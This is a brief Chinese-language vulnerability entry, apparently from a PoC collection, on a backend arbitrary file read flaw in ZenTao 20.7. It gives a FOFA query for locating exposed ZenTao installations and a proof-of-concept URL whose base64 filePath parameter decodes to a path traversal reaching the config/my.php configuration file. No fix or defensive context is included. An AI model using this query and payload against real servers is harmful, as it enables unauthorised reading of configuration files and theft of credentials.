# 禅道20.7后台任意文件读取漏洞

禅道20.7后台任意文件读取漏洞，只能读取网站目录下的文件

## fofa

```javascript
app="易软天创-禅道系统"
```

## poc

```javascript
http://192.168.91.1:8017/index.php?m=editor&f=edit&filePath=Li4vLi4vY29uZmlnL215LnBocA==&action=extendOther&isExtends=3
```

![image-20241028155218530](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410281552692.png)